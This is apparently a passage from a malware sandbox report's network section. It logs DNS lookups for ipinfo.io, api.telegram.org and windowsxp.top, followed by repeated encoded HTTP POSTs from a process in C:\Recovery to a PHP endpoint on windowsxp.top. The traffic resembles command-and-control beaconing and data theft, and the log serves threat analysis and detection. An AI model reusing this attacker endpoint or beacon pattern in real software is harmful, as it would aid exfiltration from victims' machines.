                                                                                                                  Oct 27, 2024 19:24:37.389167070 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.461842060 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.467268944 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.467377901 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.635092974 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.705276966 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.774246931 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.789851904 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.041583061 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.053174019 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.086834908 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.164868116 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.176729918 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.176820040 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.177220106 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.182611942 CET8050140188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.182686090 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.182768106 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.182801008 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.182862043 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.182884932 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.182929039 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.188168049 CET8050140188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.539916039 CET5014080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:38.545308113 CET8050140188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.792627096 CET8050140188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:38.965241909 CET5014080192.168.2.4188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 19:22:26.520730972 CET | 53541 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 19:22:26.528398991 CET | 53 | 53541 | 1.1.1.1 | 192.168.2.4
Oct 27, 2024 19:22:28.299777031 CET | 59603 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 19:22:28.309906006 CET | 53 | 59603 | 1.1.1.1 | 192.168.2.4
Oct 27, 2024 19:22:42.393237114 CET | 54361 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 19:22:42.583858013 CET | 53 | 54361 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 27, 2024 19:22:26.520730972 CET | 192.168.2.4 | 1.1.1.1 | 0x40a4 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Oct 27, 2024 19:22:28.299777031 CET | 192.168.2.4 | 1.1.1.1 | 0x8155 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 27, 2024 19:22:42.393237114 CET | 192.168.2.4 | 1.1.1.1 | 0x97be | Standard query (0) | windowsxp.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 27, 2024 19:22:26.528398991 CET | 1.1.1.1 | 192.168.2.4 | 0x40a4 | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 19:22:28.309906006 CET | 1.1.1.1 | 192.168.2.4 | 0x8155 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 19:22:42.583858013 CET | 1.1.1.1 | 192.168.2.4 | 0x97be | No error (0) | windowsxp.top | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 19:22:42.583858013 CET | 1.1.1.1 | 192.168.2.4 | 0x97be | No error (0) | windowsxp.top | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                                                                                  • ipinfo.io
                                                                                                                  • api.telegram.org
                                                                                                                  • windowsxp.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe

Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:22:42.604154110 CET | 344 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 344
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Oct 27, 2024 19:22:43.219101906 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:22:43.542912006 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NuAiei8gIFs%2F060AdARj5QCGnQsXhcLeKfNKbUcQkJXnExbabrcuLDzzO5%2BeGdcU0qj%2F8Rbr6F1jH1f%2FfijjRWQBh1ds%2Fbz1GpkV3i7haXRKwJhcBe2%2BVUCtyYKBq8Z6"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b68faec8e54a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1096&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=688&delivery_rate=1364750&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Oct 27, 2024 19:22:43.731729031 CET | 320 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 384
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:22:43.859299898 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:22:44.171400070 CET | 919 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksiV7l4eS4XCVvVmRBFPXMJApSkx%2F5WB1K6kMPKd00Ibv1zRUJsUJsKIcb1PFOJf37y1ThfeFGqKM5sCre05Hoxg303QsgNekwKZl4KZG4ThLFnk2y4iyAxOD2HZKsUi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b693bca3e54a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2169&recv_bytes=1392&delivery_rate=3719178&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe

Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:22:44.954720974 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:22:45.549926996 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:22:45.852617979 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tYZ7RSdACfc9T0wGOFvEw9xBA7aza40hMkarTafnKOcjGLeF3hZwvrSSqq36uqSbDjnlQSf8HIiwH%2F%2BrYajMC%2F5v11bUYsWvKa37aRX%2Bb0taBXBUIoC%2FFJSyFzMGHu4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b69e4a5be762-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1054&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1343228&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  2 | 192.168.2.4 | 49743 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:45.000946045 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1712
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:45.352305889 CET | 1712 | OUT | Data Raw: 55 50 58 5f 5e 58 53 53 54 58 57 54 54 52 5b 59 59 5c 5b 58 52 52 52 5b 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPX_^XSSTXWTTR[YY\[XRRR[T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'16#5'.?%888?=,U !8/=>>9!Y##X(
                                                                                                                  Oct 27, 2024 19:22:45.597021103 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:45.904166937 CET | 760 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QgNPc%2F8blPJ93n8wBB2IX5VkelPDKA8HXaHHWX7uyOITQaDOHLwnaHNrCWVmEm%2Bfe0HyqlGvsAIRCWJWMFc%2BifZg1bzYGcNvmE9brpEGmdvwMoZ4tGrNS7uCfpg%2BSvwZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b69e9a372fe8-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2033&delivery_rate=1328440&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Oct 27, 2024 19:22:45.904325962 CET | 163 | IN | Data Raw: 39 38 0d 0a 03 1a 22 5f 37 3d 20 11 28 2c 2a 0d 29 1f 0b 59 25 2c 2e 03 2f 1c 38 12 28 2d 39 56 2f 38 3d 0e 24 34 35 45 28 29 2b 02 37 2d 38 1c 3e 25 21 5e 00 1c 27 17 20 3e 3a 0f 32 3b 33 05 27 1e 0a 5d 22 2d 11 17 29 3e 2d 51 3c 07 23 02 3f 3b
                                                                                                                  Data Ascii: 98"_7= (,*)Y%,./8(-9V/8=$45E()+7-8>%!^' >:2;3']"-)>-Q<#?;/S/Y2%*.Y8->**T"-Y Z6"9("(3> ')(W???6"<8]+()0,*"T")S0YP0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  3 | 192.168.2.4 | 49744 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:46.355181932 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:46.712167025 CET | 1008 | OUT | Data Raw: 55 5a 5d 58 5e 5d 56 52 54 58 57 54 54 55 5b 59 59 51 5b 5d 52 52 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZ]X^]VRTXWTTU[YYQ[]RRRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&.#"^!&8^:738$/X+)?##!',#*%9!Y##X(/
                                                                                                                  Oct 27, 2024 19:22:46.953052998 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:47.264524937 CET | 771 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mRE7%2FOZUl58ScIGqjFkfR2%2BcadqpbID6HCxnPq4umqx8Kux7Lvia8YxBI3ysxSr4mcPux6lqTua7uYuFb9kiv2U0A4%2B4XkgTnRkNkjywYcRr1rZboBtmwLdaNvpeJqfY"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6a71e030c1f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1817&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=794731&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  4 | 192.168.2.4 | 49746 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:47.457740068 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:47.805830002 CET | 1012 | OUT | Data Raw: 55 56 58 5e 5b 5e 53 53 54 58 57 54 54 52 5b 5c 59 5b 5b 5e 52 5e 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVX^[^SSTXWTTR[\Y[[^R^R^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1<5*2"&\9$4$88W/>+ ^,[ *<9/!Y##X(
                                                                                                                  Oct 27, 2024 19:22:48.058985949 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:48.371516943 CET | 774 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HR%2FkCOTxH5hPV8OQPNGcvKCbt1y5dCZaS%2BLemk6lBgByCixWLysC0iOtyddqUX2N2LiN%2BbDLC%2B8xdjHfPZxcLY0swhm19OOfNb1zcEOcYmeAQb80WkCw2AY67ViJCBLt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6adff066ba0-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1279151&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  5 | 192.168.2.4 | 49747 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:48.663537979 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:49.008608103 CET | 1012 | OUT | Data Raw: 50 52 58 5c 5b 5b 56 54 54 58 57 54 54 50 5b 5e 59 5a 5b 5e 52 5e 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRX\[[VTTXWTTP[^YZ[^R^RYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1(")%66(:0++,'(/#$-.()<&:!Y##X(7
                                                                                                                  Oct 27, 2024 19:22:49.264313936 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:49.582602978 CET | 775 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=clqTg8OjFLv%2BkUmLr0Kx4KH1lwKwLNPY6jKLgMY%2FxkBdSuXT%2FYRevGpXgP31EhKU%2FLtKbJ2WjG%2FyOyuW7uSB3hpzWnZZkCWGG7WN6nvE94sDiqeozfEUmXPjkLzM5xQQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6b58c344695-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1965&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=738022&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  6 | 192.168.2.4 | 49750 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:49.780354023 CET | 347 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 130940
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:50.383308887 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  7 | 192.168.2.4 | 49751 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:49.811465979 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:50.190643072 CET | 1012 | OUT | Data Raw: 55 50 58 55 5b 58 56 52 54 58 57 54 54 52 5b 5a 59 51 5b 59 52 50 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPXU[XVRTXWTTR[ZYQ[YRPRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y'>/5:68\.B0^%+;;,>?<P"2?^,[+_>/>-?!Y##X(
                                                                                                                  Oct 27, 2024 19:22:50.426687956 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  8 | 192.168.2.4 | 49754 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:50.788919926 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:51.133835077 CET | 1012 | OUT | Data Raw: 55 56 58 58 5b 5b 56 52 54 58 57 54 54 50 5b 5d 59 58 5b 5a 52 53 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVXX[[VRTXWTTP[]YX[ZRSRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2>!:9]56,:3'($Q/-<V=<$"!'Z-=^>,5,/!Y##X(7
                                                                                                                  Oct 27, 2024 19:22:51.405128002 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  9 | 192.168.2.4 | 49755 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
